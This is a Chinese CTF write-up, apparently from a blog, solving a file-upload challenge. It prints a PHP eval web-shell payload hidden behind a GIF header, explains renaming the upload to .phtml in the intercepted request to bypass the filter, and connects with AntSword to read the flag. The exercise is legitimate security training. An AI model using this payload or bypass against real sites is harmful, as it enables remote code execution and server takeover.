当前位置: 首页 > news >正文

[ACTF2020 新生赛]Upload 1

题目环境:
image.png

仍旧是文件上传漏洞

这道题和上一道大差不差、大同小异、这里不再赘述。
[极客大挑战 2019]Upload 1:https://blog.csdn.net/m0_73734159/article/details/134267317?spm=1001.2014.3001.5501
区别在于本题需要在抓包数据里面改文件后缀,在外部改是不行的
这两道题可以对比进行研究

编写一语句木马脚本
GIF89a<script language="php">@eval($_POST['shell']);</script>
文件命名为flag.jpg
image.png
image.png
上传文件并进行抓包
image.png
在抓包数据里面进行修改文件后缀将flag.jpg修改为flag.phtml
记住原文件不要动只在数据包里面修改,不然的话是绕不过的!!!
image.png
Repeater重放Send
成功上传
image.png
访问上传的文件
image.png
此时已经可以进行蚁剑连接了
复制URL进行蚁剑连接
image.png
在/根目录下找到flag文件
image.png
访问flag文件
image.png
得到flag:
flag{9c59f5e5-7dd6-48fa-90f0-dae0ab50e190}

相关文章:

  • wpf 和winform 的区别
  • LeetCode 260. 只出现一次的数字 III 中等
  • 轻松下载网页音频和视频
  • JAVA IDEA 下载
  • 数学建模比赛中常用的建模提示词(数模prompt)
  • NFT合约部署
  • 面试--mysql基础
  • Netty心跳检测
  • AI:76-基于机器学习的智能城市交通管理
  • Rust4.1 Managing Growing Projects with Packages, Crates, and Modules
  • python之SPC:计算Cpk
  • 2023.11.10联赛 T4题解
  • 一个“Hello, World”Flask应用程序
  • 冲突域、广播域、一些网络设备
  • 大容量疯了!居然想把磁带放到硬盘,100TB+是否可以实现?
  • 2017-09-12 前端日报
  • conda常用的命令
  • CSS 三角实现
  • ES6 学习笔记(一)let,const和解构赋值
  • Fundebug计费标准解释:事件数是如何定义的?
  • JavaScript类型识别
  • JS进阶 - JS 、JS-Web-API与DOM、BOM
  • JS实现简单的MVC模式开发小游戏
  • js数组之filter
  • js学习笔记
  • Linux学习笔记6-使用fdisk进行磁盘管理
  • Netty源码解析1-Buffer
  • PermissionScope Swift4 兼容问题
  • quasar-framework cnodejs社区
  • WinRAR存在严重的安全漏洞影响5亿用户
  • 给github项目添加CI badge
  • 基于Android乐音识别(2)
  • 基于web的全景—— Pannellum小试
  • 免费小说阅读小程序
  • 排序算法之--选择排序
  • 容器服务kubernetes弹性伸缩高级用法
  • 深度学习入门:10门免费线上课程推荐
  • 为视图添加丝滑的水波纹
  • 学习HTTP相关知识笔记
  • 2017年360最后一道编程题
  • ​LeetCode解法汇总2182. 构造限制重复的字符串
  • ​软考-高级-系统架构设计师教程(清华第2版)【第12章 信息系统架构设计理论与实践(P420~465)-思维导图】​
  • ###51单片机学习(2)-----如何通过C语言运用延时函数设计LED流水灯
  • #14vue3生成表单并跳转到外部地址的方式
  • (06)金属布线——为半导体注入生命的连接
  • (C语言)逆序输出字符串
  • (第9篇)大数据的的超级应用——数据挖掘-推荐系统
  • (附源码)springboot课程在线考试系统 毕业设计 655127
  • (附源码)ssm经济信息门户网站 毕业设计 141634
  • (六)Hibernate的二级缓存
  • (排序详解之 堆排序)
  • (一)VirtualBox安装增强功能
  • (转)jdk与jre的区别
  • ***测试-HTTP方法
  • . ./ bash dash source 这五种执行shell脚本方式 区别